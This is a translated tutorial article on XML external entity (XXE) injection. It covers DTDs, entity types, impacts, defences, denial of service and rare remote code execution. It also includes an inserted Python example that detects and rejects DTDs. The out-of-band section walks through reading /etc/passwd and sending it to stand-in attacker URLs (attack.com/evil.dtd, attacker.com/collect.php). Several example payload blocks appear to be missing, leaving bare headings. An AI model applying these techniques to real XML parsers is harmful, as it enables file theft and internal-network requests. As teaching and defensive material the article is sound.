2025-03-26 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains the basic concepts of XXE and how it is used. Readers who are interested may wish to have a look; the method introduced here is simple, fast and practical. Let the editor take you through "the basic concepts and uses of XXE".
The basic concepts and use of XXE
This paper summarizes the principles and concepts of XXE while leaving out fine detail. It selects representative material from the Black Hat EU 2013 talk "XML Out-Of-Band Data Retrieval", the article "Out-of-band XML External Entity (OOB-XXE)" and other high-quality articles, and translates it. Terminology is kept as concise as possible without sacrificing accuracy.
0x00 References
What is an XML external entity (XXE) attack
Out-of-band XML external entity (OOB-XXE)
XML Out-Of-Band Data Retrieval
XML external entity processing
A4:2017-XML External Entities (XXE)
0x01 XXE overview
XXE stands for XML External Entity Injection.
It is an attack against applications that parse XML input. The attack occurs when an improperly configured XML processor handles XML input that contains references to external entities.
The role of XML
XML is designed to transfer and store data, focusing on the content of the data. To interpret XML data, an application needs an XML parser.
An XML document can be of a specific type. The type is declared in the document by specifying a type definition, and the XML parser verifies that the document conforms to that definition before processing it. Two kinds of type definition can be used: an XML Schema Definition (XSD) or a Document Type Definition (DTD). XXE vulnerabilities arise in the document type definition.
What is a DTD (document type definition)
A DTD (document type definition) defines the legal building blocks of an XML document. The DTD declaration, the part of an XML document that declares the DTD or the source of the DTD, can be included inside the XML document that uses it, or can exist as a separate DTD file (*.dtd).
DTDs are therefore generally referenced or declared in two ways:
1. Internal DTD: the elements, attributes and entities of the XML document are all declared inside the XML document itself.
2. External DTD: the elements, attributes and entities of the XML document are declared in a separate DTD file (.dtd).
There are three forms of DTD declaration:
Internal DTD:
External DTD:
Combination of internal and external DTD:
The internal DTD form is the one most commonly used in XXE.
Within a DTD we can declare external entities.
What is an XML entity (ENTITY)
Entities are variables that define shortcuts referencing plain text or special characters.
XML entities can come from almost anywhere, including external resources (hence the name XML external entities).
Entity types in a DTD are generally divided into internal and external entities, and further subdivided into ordinary (general) entities and parameter entities.
Specific classification of entities
Predefined entities: &amp; (&) and &lt; (<), plus numeric character references such as &#37; (%)
Internal entity:
External entities:
Internal entities and external entities are collectively referred to as ordinary (general) entities.
An ordinary entity is referenced as &name;
Parameter entity:
A parameter entity is referenced as %name;
Both ordinary entities and parameter entities may be:
Internal (defined in the current DTD)
External (defined in external resources)
Risk factors that may lead to XXE
The application parses XML documents
The system identifier portion of an entity in the document type declaration (DTD) can contain tainted (attacker-controlled) data
The XML parser is configured to validate and process the DTD
The XML parser is configured to resolve external entities declared in the DTD
The impact of XXE
Local file disclosure
Access to the private (internal) network
Host scanning / port scanning
Remote code execution (rare)
Denial of service
Defense
Use simpler data formats (such as JSON) whenever possible, and avoid serializing sensitive data.
Patch or upgrade XML processors and libraries. Use a dependency checker.
Disable XML external entity and DTD processing in every XML parser used by the application.
Implement positive (whitelist) server-side input validation, filtering or sanitization to prevent hostile data within XML documents, headers or nodes.
Make sure that XML or XSL file upload functionality validates incoming XML using an XSD (XML Schema Definition).
Use SAST tools to detect XXE in source code.
Use virtual patching, API security gateways or a Web Application Firewall (WAF) to detect, monitor and block XXE attacks.
0x02 Local file reading
When the user's input is echoed back in the response, the XXE is called an error-based XXE.
Attackers can make use of XML entities because XML entities do not have to be defined inside the XML document itself. In fact, XML entities can come from almost anywhere, including external resources (hence the name XML external entities). This is why XXE is also a form of server-side request forgery (SSRF).
An attacker can use a URI (called a system identifier in XML) to craft a request that references an external entity. If the XML parser is configured to process external entities (many XML parsers are configured this way by default), the web server returns a file from the system that may contain sensitive data.
Of course, attackers are not limited to reading system files. If they know the path and structure of the web application, they can just as easily steal other local files, including source code. With some XML parsers it is even possible to obtain directory listings and the contents of local resources. XML external entity attacks can also let the attacker make ordinary HTTP requests to resources on the local network (that is, resources reachable only from behind the firewall).
In practice, however, this method has limitations:
XXE can only retrieve files or responses that are well-formed XML
XXE cannot be used to retrieve binary files
The parser must have sufficient permissions to read the target file
Attempting to read very large or endless files such as /dev/random and /dev/zero results in a denial of service
Solutions to the XML limitations
CDATA (character data)
Accessing text files that contain XML special characters (such as & or <)
The XML parser ignores XML special characters inside CDATA (character data) sections.
The attack takes place as follows:
The XML parser first processes the %file parameter entity, which loads the file /etc/passwd.
Next, the XML parser requests the attacker's DTD file located at http://attack.com/evil.dtd.
After the XML parser processes the attacker's DTD file, the %all parameter entity creates a general entity called send, which contains a URL. The URL carries the contents of the file (for example, http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh).
Finally, once the URL has been constructed, the XML parser processes the &send; entity, which makes a request to the attacker's server.
The attacker logs the requests on their server and reconstructs the file from the log entries.
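The defense list above says to disable DTD and external entity processing, and the flow just described shows why: the file read, the remote DTD fetch and the send entity are all declarations inside the DTD. The following added example (not code from the original article) shows a defensive gatekeeper in Python: it lets expat report DOCTYPE and entity declarations without resolving any system identifier, then refuses to parse any untrusted document that carries a DTD at all. The sample documents and the system identifiers in them are constructed placeholders.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DTD; every entity kind is declared there."""

def inspect_dtd(data: bytes) -> list:
    """Report the DTD constructs in `data` as (kind, name, system_id) tuples.

    expat only reports the declarations: with no ExternalEntityRefHandler
    installed it never fetches a SYSTEM identifier, so inspection alone
    cannot trigger the file read or the remote DTD fetch.
    """
    findings = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: findings.append(("doctype", name, sysid)))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter-entity" if is_param else "general-entity"
        if sysid is not None:  # SYSTEM/PUBLIC identifier: the external (XXE) case
            kind = "external-" + kind
        findings.append((kind, name, sysid))

    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # malformed body or unresolved reference: declarations already seen still count
    return findings

def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing any document that declares a DTD."""
    findings = inspect_dtd(data)
    if findings:
        raise DtdRejected(findings)
    return ET.fromstring(data)

# Constructed samples (not from the article). The last two mirror the shapes the
# text describes: an external general entity, and a parameter entity that pulls in
# a remote DTD as in the out-of-band flow. System identifiers are placeholders.
SAFE_DOC = b'<?xml version="1.0"?><order><id>42</id></order>'
INTERNAL_ENTITY_DOC = b'<!DOCTYPE order [<!ENTITY greet "hi">]><order>&greet;</order>'
EXTERNAL_ENTITY_DOC = (b'<!DOCTYPE order [<!ENTITY ext SYSTEM "file:///path/placeholder">]>'
                       b'<order>&ext;</order>')
OOB_SHAPED_DOC = (b'<!DOCTYPE order [<!ENTITY % dtd SYSTEM "http://dtd.example.invalid/x.dtd">'
                  b'%dtd;]><order/>')

if __name__ == "__main__":
    for doc in (SAFE_DOC, INTERNAL_ENTITY_DOC, EXTERNAL_ENTITY_DOC, OOB_SHAPED_DOC):
        print(inspect_dtd(doc) or "no DTD: accepted")
```

Rejecting every DTD also removes the recursive and oversized entity definitions used for the denial-of-service attack discussed later, since those too can only be declared in a DTD.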
2. Data extraction through FTP
3. DNS query
XXE Attacks-Part 2: XML DTD related Attacks
Conclusion
In-band and out-of-band XML external entity injection (XXE) vulnerabilities are so serious that almost every web application that parses XML documents is affected. XXE can be used to cause a denial of service and to steal system files and source code from the local server. Attackers can also use XXE to launch server-side request forgery (SSRF) attacks against other servers on the internal network.
XML DoS attack
Define an entity with a recursive reference.
Or define a large entity and reference it multiple times.
On a Unix system, you can declare an external entity in the DTD that reads the endless file /dev/random via the file protocol.
This attack exhausts the memory of the XML parser. Some XML parsers automatically cap the amount of memory they may use.
Remote code execution
RCE can be achieved in PHP applications through XXE, but this is very rare. It is only possible if the target system has PHP's Expect module loaded (it is disabled by default). In addition, PHP 7 does not support the Expect module.
XXE is easier to exploit in PHP applications, because PHP provides many URL handlers, stream wrappers and data filters, which enlarges the attack surface.
By default, PHP supports external entities.
At this point, I believe you have a deeper understanding of "the basic concepts and use of XXE". You might as well try it out in practice. For more related content, see the relevant channels on this site; follow us and keep learning!